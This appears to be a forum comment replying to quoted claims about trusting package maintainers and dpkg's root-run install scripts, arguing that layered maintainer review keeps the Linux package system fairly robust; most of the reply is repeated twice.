> dpkg runs arbitrary package scripts as root, so you still put trust in whoever signed the package.
This is correct, but in those cases the maintainer is likely a much more trusted individual where more eyes are on the script as the hierarchy of maintainers sign off on things until the point it makes it into a readily accessible repository by end-users.
> Your distro's overworked unpaid maintainer LGTMs packages with a glance, and won't review millions lines of code for backdoors.
The same argument could be made about the Linux kernel itself, yet the system is surprisingly robust and examples of abuse are few and far between.
This is correct, but in those cases the maintainer is likely a much more trusted individual where more eyes are on the script as the hierarchy of maintainers sign off on things until the point it makes it into a readily accessible repository by end-users.
> Your distro's overworked unpaid maintainer LGTMs packages with a glance, and won't review millions lines of code for backdoors.
The same argument could be made about the Linux kernel itself, yet the system is surprisingly robust and examples of abuse are few and far between.